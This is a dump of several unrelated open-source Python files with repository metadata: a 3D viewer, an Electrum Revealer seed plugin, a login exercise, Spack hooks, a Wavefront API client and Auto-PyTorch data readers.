self.viewer_flags['fullscreen']: self._message_text = 'Fullscreen On' else: self._message_text = 'Fullscreen Off' # S toggles shadows elif symbol == pyglet.window.key.H and sys.platform != 'darwin': self.render_flags['shadows'] = not self.render_flags['shadows'] if self.render_flags['shadows']: self._message_text = 'Shadows On' else: self._message_text = 'Shadows Off' elif symbol == pyglet.window.key.I: if (self.viewer_flags['show_world_axis'] and not self.viewer_flags['show_mesh_axes']): self.viewer_flags['show_world_axis'] = False self.viewer_flags['show_mesh_axes'] = True self._set_axes(False, True) self._message_text = 'Mesh Axes On' elif (not self.viewer_flags['show_world_axis'] and self.viewer_flags['show_mesh_axes']): self.viewer_flags['show_world_axis'] = True self.viewer_flags['show_mesh_axes'] = True self._set_axes(True, True) self._message_text = 'All Axes On' elif (self.viewer_flags['show_world_axis'] and self.viewer_flags['show_mesh_axes']): self.viewer_flags['show_world_axis'] = False self.viewer_flags['show_mesh_axes'] = False self._set_axes(False, False) self._message_text = 'All Axes Off' else: self.viewer_flags['show_world_axis'] = True self.viewer_flags['show_mesh_axes'] = False self._set_axes(True, False) self._message_text = 'World Axis On' # L toggles the lighting mode elif symbol == pyglet.window.key.L: if self.viewer_flags['use_raymond_lighting']: self.viewer_flags['use_raymond_lighting'] = False self.viewer_flags['use_direct_lighting'] = True self._message_text = 'Direct Lighting' elif self.viewer_flags['use_direct_lighting']: self.viewer_flags['use_raymond_lighting'] = False self.viewer_flags['use_direct_lighting'] = False self._message_text = 'Default Lighting' else: self.viewer_flags['use_raymond_lighting'] = True self.viewer_flags['use_direct_lighting'] = False self._message_text = 'Raymond Lighting' # M toggles face normals elif symbol == pyglet.window.key.M: self.render_flags['face_normals'] = ( not self.render_flags['face_normals'] ) if self.render_flags['face_normals']: self._message_text = 'Face Normals On' else: self._message_text = 'Face Normals Off' # N toggles vertex normals elif symbol == pyglet.window.key.N: self.render_flags['vertex_normals'] = ( not self.render_flags['vertex_normals'] ) if self.render_flags['vertex_normals']: self._message_text = 'Vert Normals On' else: self._message_text = 'Vert Normals Off' # O toggles orthographic camera mode elif symbol == pyglet.window.key.O: self.viewer_flags['use_perspective_cam'] = ( not self.viewer_flags['use_perspective_cam'] ) if self.viewer_flags['use_perspective_cam']: camera = self._default_persp_cam self._message_text = 'Perspective View' else: camera = self._default_orth_cam self._message_text = 'Orthographic View' cam_pose = self._camera_node.matrix.copy() cam_node = Node(matrix=cam_pose, camera=camera) self.scene.remove_node(self._camera_node) self.scene.add_node(cam_node) self.scene.main_camera_node = cam_node self._camera_node = cam_node # Q quits the viewer elif symbol == pyglet.window.key.Q: self.on_close() # R starts recording frames elif symbol == pyglet.window.key.R: if self.viewer_flags['record']: self.save_gif() self.set_caption(self.viewer_flags['window_title']) else: self.set_caption( '{} (RECORDING)'.format(self.viewer_flags['window_title']) ) self.viewer_flags['record'] = not self.viewer_flags['record'] # S saves the current frame as an image elif symbol == pyglet.window.key.S: self._save_image() # W toggles through wireframe modes elif symbol == pyglet.window.key.W: if self.render_flags['flip_wireframe']: self.render_flags['flip_wireframe'] = False self.render_flags['all_wireframe'] = True self.render_flags['all_solid'] = False self._message_text = 'All Wireframe' elif self.render_flags['all_wireframe']: self.render_flags['flip_wireframe'] = False self.render_flags['all_wireframe'] = False self.render_flags['all_solid'] = True self._message_text = 'All Solid' elif self.render_flags['all_solid']: self.render_flags['flip_wireframe'] = False self.render_flags['all_wireframe'] = False self.render_flags['all_solid'] = False self._message_text = 'Default Wireframe' else: self.render_flags['flip_wireframe'] = True self.render_flags['all_wireframe'] = False self.render_flags['all_solid'] = False self._message_text = 'Flip Wireframe' # Z resets the camera viewpoint elif symbol == pyglet.window.key.Z: self._reset_view() if self._message_text is not None: self._message_opac = 1.0 + self._ticks_till_fade @staticmethod def _time_event(dt, self): """The timer callback. """ # Don't run old dead events after we've already closed if not self._is_active: return if self.viewer_flags['record']: self._record() if (self.viewer_flags['rotate'] and not self.viewer_flags['mouse_pressed']): self._rotate() # Manage message opacity if self._message_text is not None: if self._message_opac > 1.0: self._message_opac -= 1.0 else: self._message_opac *= 0.90 if self._message_opac < 0.05: self._message_opac = 1.0 + self._ticks_till_fade self._message_text = None if self._should_close: self.on_close() else: self.on_draw() def _reset_view(self): """Reset the view to a good initial state. The view is initially along the positive x-axis at a sufficient distance from the scene. """ scale = self.scene.scale if scale == 0.0: scale = DEFAULT_SCENE_SCALE centroid = self.scene.centroid if self.viewer_flags['view_center'] is not None: centroid = self.viewer_flags['view_center'] self._camera_node.matrix = self._default_camera_pose self._trackball = Trackball( self._default_camera_pose, self.viewport_size, scale, centroid ) def _get_save_filename(self, file_exts): file_types = { 'png': ('png files', '*.png'), 'jpg': ('jpeg files', '*.jpg'), 'gif': ('gif files', '*.gif'), 'all': ('all files', '*'), } filetypes = [file_types[x] for x in file_exts] try: root = Tk() save_dir = self.viewer_flags['save_directory'] if save_dir is None: save_dir = os.getcwd() filename = filedialog.asksaveasfilename( initialdir=save_dir, title='Select file save location', filetypes=filetypes ) except Exception: return None root.destroy() if filename == (): return None return filename def _save_image(self): filename = self._get_save_filename(['png', 'jpg', 'gif', 'all']) if filename is not None: self.viewer_flags['save_directory'] = os.path.dirname(filename) imageio.imwrite(filename, self._renderer.read_color_buf()) def _record(self): """Save another frame for the GIF. """ data = self._renderer.read_color_buf() if not np.all(data == 0.0): self._saved_frames.append(data) def _rotate(self): """Animate the scene by rotating the camera. """ az = (self.viewer_flags['rotate_rate'] / self.viewer_flags['refresh_rate']) self._trackball.rotate(az, self.viewer_flags['rotate_axis']) def _render(self): """Render the scene into the framebuffer and flip. """ scene = self.scene self._camera_node.matrix = self._trackball.pose.copy() # Set lighting vli = self.viewer_flags['lighting_intensity'] if self.viewer_flags['use_raymond_lighting']: for n in self._raymond_lights: n.light.intensity = vli / 3.0 if not self.scene.has_node(n): scene.add_node(n, parent_node=self._camera_node) else: self._direct_light.light.intensity = vli for n in self._raymond_lights: if self.scene.has_node(n): self.scene.remove_node(n) if self.viewer_flags['use_direct_lighting']: if not self.scene.has_node(self._direct_light): scene.add_node( self._direct_light, parent_node=self._camera_node ) elif self.scene.has_node(self._direct_light): self.scene.remove_node(self._direct_light) flags = RenderFlags.NONE if self.render_flags['flip_wireframe']: flags |= RenderFlags.FLIP_WIREFRAME elif self.render_flags['all_wireframe']: flags |= RenderFlags.ALL_WIREFRAME elif self.render_flags['all_solid']: flags |= RenderFlags.ALL_SOLID if self.render_flags['shadows']: flags |= RenderFlags.SHADOWS_DIRECTIONAL | RenderFlags.SHADOWS_SPOT if self.render_flags['vertex_normals']: flags |= RenderFlags.VERTEX_NORMALS if self.render_flags['face_normals']: flags |= RenderFlags.FACE_NORMALS if not self.render_flags['cull_faces']: flags |= RenderFlags.SKIP_CULL_FACES self._renderer.render(self.scene, flags) def _init_and_start_app(self): from pyglet.gl import Config conf = Config(sample_buffers=1, samples=4, depth_size=24, double_buffer=True, major_version=OPEN_GL_MAJOR, minor_version=OPEN_GL_MINOR) super(Viewer, self).__init__(config=conf, resizable=True, width=self._viewport_size[0], height=self._viewport_size[1]) if self.context.config.major_version < 3: raise ValueError('Unable to initialize an OpenGL 3+ context') clock.schedule_interval( Viewer._time_event, 1.0 / self.viewer_flags['refresh_rate'], self ) self.switch_to() self.set_caption(self.viewer_flags['window_title']) pyglet.app.run() def _compute_initial_camera_pose(self): centroid = self.scene.centroid if self.viewer_flags['view_center'] is not None: centroid = self.viewer_flags['view_center'] scale = self.scene.scale if scale == 0.0: scale = DEFAULT_SCENE_SCALE s2 = 1.0 / np.sqrt(2.0) cp = np.eye(4) cp[:3,:3] = np.array([ [0.0, -s2, s2], [1.0, 0.0, 0.0], [0.0, s2, s2] ]) hfov = np.pi / 6.0 dist = scale / (2.0 * np.tan(hfov)) cp[:3,3] = dist * np.array([1.0, 0.0, 1.0]) + centroid return cp def _create_raymond_lights(self): thetas = np.pi * np.array([1.0 / 6.0, 1.0 / 6.0, 1.0 / 6.0]) phis = np.pi * np.array([0.0, 2.0 / 3.0, 4.0 / 3.0]) nodes = [] for phi, theta in zip(phis, thetas): xp = np.sin(theta) * np.cos(phi) yp = np.sin(theta) * np.sin(phi) zp = np.cos(theta) z = np.array([xp, yp, zp]) z = z / np.linalg.norm(z) x = np.array([-z[1], z[0], 0.0]) if np.linalg.norm(x) == 0: x = np.array([1.0, 0.0, 0.0]) x = x / np.linalg.norm(x) y = np.cross(z, x) matrix = np.eye(4) matrix[:3,:3] = np.c_[x,y,z] nodes.append(Node( light=DirectionalLight(color=np.ones(3), intensity=1.0), matrix=matrix )) return nodes def _create_direct_light(self): light = DirectionalLight(color=np.ones(3), intensity=1.0) n = Node(light=light, matrix=np.eye(4)) return n def _set_axes(self, world, mesh): scale = self.scene.scale if world: if 'scene' not in self._axes: n = Node(mesh=self._axis_mesh, scale=np.ones(3) * scale * 0.3) self.scene.add_node(n) self._axes['scene'] = n else: if 'scene' in self._axes: self.scene.remove_node(self._axes['scene']) self._axes.pop('scene') if mesh: old_nodes = [] existing_axes = set([self._axes[k] for k in self._axes]) for node in self.scene.mesh_nodes: if node not in existing_axes: old_nodes.append(node) for node in old_nodes: if node in self._axes: continue n = Node( mesh=self._axis_mesh, scale=np.ones(3) * node.mesh.scale * 0.5 ) self.scene.add_node(n, parent_node=node) self._axes[node] = n else: to_remove = set() for main_node in self._axes: if main_node in self.scene.mesh_nodes: self.scene.remove_node(self._axes[main_node]) to_remove.add(main_node) for main_node in to_remove: self._axes.pop(main_node) def _remove_axes(self): for main_node in self._axes: axis_node = self._axes[main_node] self.scene.remove_node(axis_node) self._axes = {} def _location_to_x_y(self, location): if location == TextAlign.CENTER: return (self.viewport_size[0] / 2.0, self.viewport_size[1] / 2.0) elif location == TextAlign.CENTER_LEFT: return (TEXT_PADDING, self.viewport_size[1] / 2.0) elif location == TextAlign.CENTER_RIGHT: return (self.viewport_size[0] - TEXT_PADDING, self.viewport_size[1] / 2.0) elif location == TextAlign.BOTTOM_LEFT: return (TEXT_PADDING, TEXT_PADDING) elif location == TextAlign.BOTTOM_RIGHT: return (self.viewport_size[0] - TEXT_PADDING, TEXT_PADDING) elif location == TextAlign.BOTTOM_CENTER: return (self.viewport_size[0] / 2.0, TEXT_PADDING) elif location == TextAlign.TOP_LEFT: return (TEXT_PADDING, self.viewport_size[1] - TEXT_PADDING) elif location == TextAlign.TOP_RIGHT: return (self.viewport_size[0] - TEXT_PADDING, self.viewport_size[1] - TEXT_PADDING) elif location == TextAlign.TOP_CENTER: return (self.viewport_size[0] / 2.0, self.viewport_size[1] - TEXT_PADDING) __all__ = ['Viewer']
38.202834
88
0.571399
5f7e13a979805a3a5ace82b752da0eec596f6153
3,561
py
Python
electrumsys/plugins/revealer/revealer.py
syscoin/electrum
ac576539c758640ff87ed6be1311eb57b57d205f
[ "MIT" ]
1
2019-06-26T16:51:43.000Z
2019-06-26T16:51:43.000Z
electrumsys/plugins/revealer/revealer.py
syscoin/electrumsys
ac576539c758640ff87ed6be1311eb57b57d205f
[ "MIT" ]
null
null
null
electrumsys/plugins/revealer/revealer.py
syscoin/electrumsys
ac576539c758640ff87ed6be1311eb57b57d205f
[ "MIT" ]
1
2018-09-10T21:43:02.000Z
2018-09-10T21:43:02.000Z
import random import os from hashlib import sha256 from typing import NamedTuple, Optional, Dict, Tuple from electrumsys.plugin import BasePlugin from electrumsys.util import to_bytes, bh2u, bfh from .hmac_drbg import DRBG class VersionedSeed(NamedTuple): version: str seed: str checksum: str def get_ui_string_version_plus_seed(self): version, seed = self.version, self.seed assert isinstance(version, str) and len(version) == 1, version assert isinstance(seed, str) and len(seed) >= 32 ret = version + seed ret = ret.upper() return ' '.join(ret[i : i+4] for i in range(0, len(ret), 4)) class RevealerPlugin(BasePlugin): LATEST_VERSION = '1' KNOWN_VERSIONS = ('0', '1') assert LATEST_VERSION in KNOWN_VERSIONS SIZE = (159, 97) def __init__(self, parent, config, name): BasePlugin.__init__(self, parent, config, name) @classmethod def code_hashid(cls, txt: str) -> str: txt = txt.lower() x = to_bytes(txt, 'utf8') hash = sha256(x).hexdigest() return hash[-3:].upper() @classmethod def get_versioned_seed_from_user_input(cls, txt: str) -> Optional[VersionedSeed]: if len(txt) < 34: return None try: int(txt, 16) except: return None version = txt[0] if version not in cls.KNOWN_VERSIONS: return None checksum = cls.code_hashid(txt[:-3]) if txt[-3:].upper() != checksum.upper(): return None return VersionedSeed(version=version.upper(), seed=txt[1:-3].upper(), checksum=checksum.upper()) @classmethod def get_noise_map(cls, versioned_seed: VersionedSeed) -> Dict[Tuple[int, int], int]: """Returns a map from (x,y) coordinate to pixel value 0/1, to be used as rawnoise.""" w, h = cls.SIZE version = versioned_seed.version hex_seed = versioned_seed.seed checksum = versioned_seed.checksum noise_map = {} if version == '0': random.seed(int(hex_seed, 16)) for x in range(w): for y in range(h): noise_map[(x, y)] = random.randint(0, 1) elif version == '1': prng_seed = bfh(hex_seed + version + checksum) drbg = DRBG(prng_seed) num_noise_bytes = 1929 # ~ w*h noise_array = bin(int.from_bytes(drbg.generate(num_noise_bytes), 'big'))[2:] # there's an approx 1/1024 chance that the generated number is 'too small' # and we would get IndexError below. easiest backwards compat fix: noise_array += '0' * (w * h - len(noise_array)) i = 0 for x in range(w): for y in range(h): noise_map[(x, y)] = int(noise_array[i]) i += 1 else: raise Exception(f"unexpected revealer version: {version}") return noise_map @classmethod def gen_random_versioned_seed(cls): version = cls.LATEST_VERSION hex_seed = bh2u(os.urandom(16)) checksum = cls.code_hashid(version + hex_seed) return VersionedSeed(version=version.upper(), seed=hex_seed.upper(), checksum=checksum.upper()) if __name__ == '__main__': for i in range(10**4): vs = RevealerPlugin.gen_random_versioned_seed() nm = RevealerPlugin.get_noise_map(vs)
33.59434
93
0.579051
8e7a5dfda3473634172982b58de10cc83690024c
265
py
Python
topicos/10_strings/respostas/LoginValido.py
erosvitor/curso-python-fundamentos
daf113f08f724f6e7a92977799c76f49a021e5bd
[ "MIT" ]
null
null
null
topicos/10_strings/respostas/LoginValido.py
erosvitor/curso-python-fundamentos
daf113f08f724f6e7a92977799c76f49a021e5bd
[ "MIT" ]
null
null
null
topicos/10_strings/respostas/LoginValido.py
erosvitor/curso-python-fundamentos
daf113f08f724f6e7a92977799c76f49a021e5bd
[ "MIT" ]
null
null
null
#!python3 print("Login") print("") loginValido = False while not loginValido: login = input("Digite o login: ") if login.strip(): print("Login válido.") loginValido = True else: print("Login inválido, tente novamente.") loginValido = False
16.5625
45
0.656604
363654efc40d7ca4613b8d9352eb6dfea0b4c779
1,018
py
Python
lib/spack/spack/hooks/module_file_generation.py
kkauder/spack
6ae8d5c380c1f42094b05d38be26b03650aafb39
[ "ECL-2.0", "Apache-2.0", "MIT-0", "MIT" ]
2
2019-02-10T13:47:48.000Z
2019-04-17T13:05:17.000Z
lib/spack/spack/hooks/module_file_generation.py
kkauder/spack
6ae8d5c380c1f42094b05d38be26b03650aafb39
[ "ECL-2.0", "Apache-2.0", "MIT-0", "MIT" ]
17
2019-03-21T15:54:00.000Z
2022-03-29T19:34:28.000Z
lib/spack/spack/hooks/module_file_generation.py
kkauder/spack
6ae8d5c380c1f42094b05d38be26b03650aafb39
[ "ECL-2.0", "Apache-2.0", "MIT-0", "MIT" ]
2
2021-04-07T18:27:09.000Z
2022-03-31T22:52:38.000Z
# Copyright 2013-2021 Lawrence Livermore National Security, LLC and other # Spack Project Developers. See the top-level COPYRIGHT file for details. # # SPDX-License-Identifier: (Apache-2.0 OR MIT) import spack.config import spack.modules import spack.modules.common import llnl.util.tty as tty def _for_each_enabled(spec, method_name): """Calls a method for each enabled module""" enabled = spack.config.get('modules:enable') if not enabled: tty.debug('NO MODULE WRITTEN: list of enabled module files is empty') return for name in enabled: generator = spack.modules.module_types[name](spec) try: getattr(generator, method_name)() except RuntimeError as e: msg = 'cannot perform the requested {0} operation on module files' msg += ' [{1}]' tty.warn(msg.format(method_name, str(e))) def post_install(spec): _for_each_enabled(spec, 'write') def post_uninstall(spec): _for_each_enabled(spec, 'remove')
29.085714
78
0.682711
2999593581b7b885aa192f7b9b50013fd436c1c3
8,536
py
Python
wavefront_api_client/api/message_api.py
PowerOlive/python-client
eebda67381fcf893914c309103878236b609a70b
[ "Apache-2.0" ]
11
2016-05-30T17:16:45.000Z
2021-06-11T19:32:59.000Z
wavefront_api_client/api/message_api.py
PowerOlive/python-client
eebda67381fcf893914c309103878236b609a70b
[ "Apache-2.0" ]
25
2016-05-02T23:05:19.000Z
2020-11-18T22:43:20.000Z
wavefront_api_client/api/message_api.py
PowerOlive/python-client
eebda67381fcf893914c309103878236b609a70b
[ "Apache-2.0" ]
30
2016-04-29T17:17:11.000Z
2022-02-11T04:58:37.000Z
# coding: utf-8 """ Wavefront REST API <p>The Wavefront REST API enables you to interact with Wavefront servers using standard REST API tools. You can use the REST API to automate commonly executed operations such as automatically tagging sources.</p><p>When you make REST API calls outside the Wavefront REST API documentation you must add the header \"Authorization: Bearer &lt;&lt;API-TOKEN&gt;&gt;\" to your HTTP requests.</p> # noqa: E501 OpenAPI spec version: v2 Contact: chitimba@wavefront.com Generated by: https://github.com/swagger-api/swagger-codegen.git """ from __future__ import absolute_import import re # noqa: F401 # python 2 and python 3 compatibility library import six from wavefront_api_client.api_client import ApiClient class MessageApi(object): """NOTE: This class is auto generated by the swagger code generator program. Do not edit the class manually. Ref: https://github.com/swagger-api/swagger-codegen """ def __init__(self, api_client=None): if api_client is None: api_client = ApiClient() self.api_client = api_client def user_get_messages(self, **kwargs): # noqa: E501 """Gets messages applicable to the current user, i.e. within time range and distribution scope # noqa: E501 # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.user_get_messages(async_req=True) >>> result = thread.get() :param async_req bool :param int offset: :param int limit: :param bool unread_only: :return: ResponseContainerPagedMessage If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.user_get_messages_with_http_info(**kwargs) # noqa: E501 else: (data) = self.user_get_messages_with_http_info(**kwargs) # noqa: E501 return data def user_get_messages_with_http_info(self, **kwargs): # noqa: E501 """Gets messages applicable to the current user, i.e. within time range and distribution scope # noqa: E501 # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.user_get_messages_with_http_info(async_req=True) >>> result = thread.get() :param async_req bool :param int offset: :param int limit: :param bool unread_only: :return: ResponseContainerPagedMessage If the method is called asynchronously, returns the request thread. """ all_params = ['offset', 'limit', 'unread_only'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method user_get_messages" % key ) params[key] = val del params['kwargs'] collection_formats = {} path_params = {} query_params = [] if 'offset' in params: query_params.append(('offset', params['offset'])) # noqa: E501 if 'limit' in params: query_params.append(('limit', params['limit'])) # noqa: E501 if 'unread_only' in params: query_params.append(('unreadOnly', params['unread_only'])) # noqa: E501 header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['api_key'] # noqa: E501 return self.api_client.call_api( '/api/v2/message', 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='ResponseContainerPagedMessage', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def user_read_message(self, id, **kwargs): # noqa: E501 """Mark a specific message as read # noqa: E501 # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.user_read_message(id, async_req=True) >>> result = thread.get() :param async_req bool :param str id: (required) :return: ResponseContainerMessage If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.user_read_message_with_http_info(id, **kwargs) # noqa: E501 else: (data) = self.user_read_message_with_http_info(id, **kwargs) # noqa: E501 return data def user_read_message_with_http_info(self, id, **kwargs): # noqa: E501 """Mark a specific message as read # noqa: E501 # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.user_read_message_with_http_info(id, async_req=True) >>> result = thread.get() :param async_req bool :param str id: (required) :return: ResponseContainerMessage If the method is called asynchronously, returns the request thread. """ all_params = ['id'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method user_read_message" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'id' is set if self.api_client.client_side_validation and ('id' not in params or params['id'] is None): # noqa: E501 raise ValueError("Missing the required parameter `id` when calling `user_read_message`") # noqa: E501 collection_formats = {} path_params = {} if 'id' in params: path_params['id'] = params['id'] # noqa: E501 query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['api_key'] # noqa: E501 return self.api_client.call_api( '/api/v2/message/{id}/read', 'POST', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='ResponseContainerMessage', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats)
37.275109
409
0.611176
5d7d7d85d2ad50b3d2d4ca0dca49023644f7a13a
9,663
py
Python
autoPyTorch/data_management/data_reader.py
urbanmatthias/Auto-PyTorch
fe7c51b33c48041e405ef2975ee691c0539691ab
[ "BSD-3-Clause" ]
1
2019-11-19T12:22:46.000Z
2019-11-19T12:22:46.000Z
autoPyTorch/data_management/data_reader.py
gaohuan2015/Auto-PyTorch
3c6bf7e051b32284d2655cc484aee1a8c982c04e
[ "Apache-2.0" ]
null
null
null
autoPyTorch/data_management/data_reader.py
gaohuan2015/Auto-PyTorch
3c6bf7e051b32284d2655cc484aee1a8c982c04e
[ "Apache-2.0" ]
null
null
null
from __future__ import print_function, division import pandas as pd import numpy as np from abc import abstractmethod import os from scipy.sparse import csr_matrix import math from autoPyTorch.data_management.data_converter import DataConverter __author__ = "Max Dippel, Michael Burkart and Matthias Urban" __version__ = "0.0.1" __license__ = "BSD" class DataReader(object): def __init__(self, file_name, is_classification=None): self.file_name = file_name self.data = None self.X = None self.Y = None self.X_valid = None self.Y_valid = None self.X_test = None self.Y_test = None self.is_classification = is_classification self.categorical_features = None self.is_multilabel = None self.max_runtime = None self.metric = None @abstractmethod def read(self): return def convert(self, **kwargs): """ Convert the data using standard data converter with standard settings. Arguments: **kwargs: args and kwargs are passed to Dataconverter """ data_converter = DataConverter(is_classification=self.is_classification, is_multilabel=self.is_multilabel, **kwargs) self.X, self.Y, self.is_classification, self.is_multilabel, self.categorical_features = data_converter.convert(self.X, self.Y) if self.X_valid is not None and self.Y_valid is not None: self.X_valid, self.Y_valid, _, _, _ = data_converter.convert(self.X_valid, self.Y_valid) if self.X_test is not None and self.Y_test is not None: self.X_test, self.Y_test, _, _, _ = data_converter.convert(self.X_test, self.Y_test) class CSVReader(DataReader): def __init__(self, file_name, is_classification=None): self.num_entries = None self.num_features = None self.num_classes = None super(CSVReader, self).__init__(file_name, is_classification) def read(self, auto_convert=True, **kwargs): """ Read the data from given csv file. Arguments: auto_convert: Automatically convert data after reading. *args, **kwargs: arguments for converting. """ self.data = pd.read_csv(self.file_name) self.num_entries = len(self.data) self.num_features = len(self.data.iloc[0]) - 1 self.data = np.array(self.data) self.X = self.data[0:self.num_entries, 0:self.num_features] #np.array( .iloc self.Y = self.data[0:self.num_entries, -1] for i in range(self.X.shape[0]): for j in range(self.X.shape[1]): if self.X[i, j] == "?": self.X[i, j] = np.nan self.num_classes = len(np.unique(self.Y)) if (auto_convert): self.convert(**kwargs) class OpenMlReader(DataReader): def __init__(self, dataset_id, is_classification = None, api_key=None): import openml self.openml = openml self.num_entries = None self.num_features = None self.num_classes = None self.dataset_id = dataset_id if api_key: openml.config.server = "https://www.openml.org/api/v1/xml" openml.config.apikey = api_key super(OpenMlReader, self).__init__("openml:" + str(dataset_id), is_classification) def read(self, **kwargs): """ Read the data from given openml dataset file. Arguments: auto_convert: Automatically convert data after reading. *args, **kwargs: arguments for converting. """ dataset = self.openml.datasets.get_dataset(self.dataset_id) try: self.X, self.Y, self.categorical_features = dataset.get_data( target=dataset.default_target_attribute, return_categorical_indicator=True) except Exception as e: raise RuntimeError("An error occurred when loading the dataset and splitting it into X and Y. Please check if the dataset is suitable.") self.num_entries = self.X.shape[0] self.num_features = self.X.shape[1] self.is_multilabel = False class_labels = dataset.retrieve_class_labels(target_name=dataset.default_target_attribute) if class_labels: self.is_classification = True self.num_classes = len(class_labels) else: self.is_classification = False self.num_classes = 1 class AutoMlReader(DataReader): def __init__(self, path_to_info): self.num_entries = None self.num_features = None self.num_classes = None super(AutoMlReader, self).__init__(path_to_info, None) def read(self, auto_convert=True, **kwargs): path_to_info = self.file_name info_dict = dict() # read info file with open(path_to_info, "r") as f: for line in f: info_dict[line.split("=")[0].strip()] = line.split("=")[1].strip().strip("'") self.is_classification = "classification" in info_dict["task"] name = info_dict["name"] path = os.path.dirname(path_to_info) self.is_multilabel = "multilabel" in info_dict["task"] if self.is_classification else None self.metric = info_dict["metric"] self.max_runtime = float(info_dict["time_budget"]) target_num = int(info_dict["target_num"]) feat_num = int(info_dict["feat_num"]) train_num = int(info_dict["train_num"]) valid_num = int(info_dict["valid_num"]) test_num = int(info_dict["test_num"]) is_sparse = bool(int(info_dict["is_sparse"])) feats_binary = info_dict["feat_type"].lower() == "binary" # read feature types force_categorical = [] force_numerical = [] if info_dict["feat_type"].lower() == "binary" or info_dict["feat_type"].lower() == "numerical": force_numerical = [i for i in range(feat_num)] elif info_dict["feat_type"].lower() == "categorical": force_categorical = [i for i in range(feat_num)] elif os.path.exists(os.path.join(path, name + "_feat.type")): with open(os.path.join(path, name + "_feat.type"), "r") as f: for i, line in enumerate(f): if line.strip().lower() == "numerical": force_numerical.append(i) elif line.strip().lower() == "categorical": force_categorical.append(i) # read data files reading_function = self.read_datafile if not is_sparse else ( self.read_sparse_datafile if not feats_binary else self.read_binary_sparse_datafile) self.X = reading_function(os.path.join(path, name + "_train.data"), (train_num, feat_num)) self.Y = self.read_datafile(os.path.join(path, name + "_train.solution"), (train_num, target_num)) if os.path.exists(os.path.join(path, name + "_valid.data")) and \ os.path.exists(os.path.join(path, name + "_valid.solution")): self.X_valid = reading_function(os.path.join(path, name + "_valid.data"), (valid_num, feat_num)) self.Y_valid = self.read_datafile(os.path.join(path, name + "_valid.solution"), (valid_num, target_num)) if os.path.exists(os.path.join(path, name + "_test.data")) and \ os.path.exists(os.path.join(path, name + "_test.solution")): self.X_test = reading_function(os.path.join(path, name + "_test.data"), (test_num, feat_num)) self.Y_test = self.read_datafile(os.path.join(path, name + "_test.solution"), (test_num, target_num)) if not self.is_multilabel and self.is_classification and self.Y.shape[1] > 1: self.Y = np.argmax(self.Y, axis=1) self.Y_valid = np.argmax(self.Y_valid, axis=1) if self.Y_valid is not None else None self.Y_test = np.argmax(self.Y_test, axis=1) if self.Y_test is not None else None if auto_convert and not is_sparse: self.convert(force_categorical=force_categorical, force_numerical=force_numerical, **kwargs) def read_datafile(self, filepath, shape): data = [] with open(filepath, "r") as f: for line in f: data.append([float(v.strip()) for v in line.split()]) return np.array(data) def read_sparse_datafile(self, filepath, shape): data = [] row_indizes = [] col_indizes = [] with open(filepath, "r") as f: for row, line in enumerate(f): print("\rReading line:", row, "of", shape[0], end="") for value in line.split(): value = value.rstrip() data.append(float(value.split(":")[1])) col_indizes.append(int(value.split(":")[0]) - 1) row_indizes.append(row) print("Done") return csr_matrix((data, (row_indizes, col_indizes)), shape=shape) def read_binary_sparse_datafile(self, filepath, shape): row_indizes = [] col_indizes = [] with open(filepath, "r") as f: for row, line in enumerate(f): print("\rReading line:", row, "of", shape[0], end="") for value in line.split(): value = value.rstrip() col_indizes.append(int(value) - 1) row_indizes.append(row) print("Done") return csr_matrix(([1] * len(row_indizes), (row_indizes, col_indizes)), shape=shape)
41.294872
148
0.608093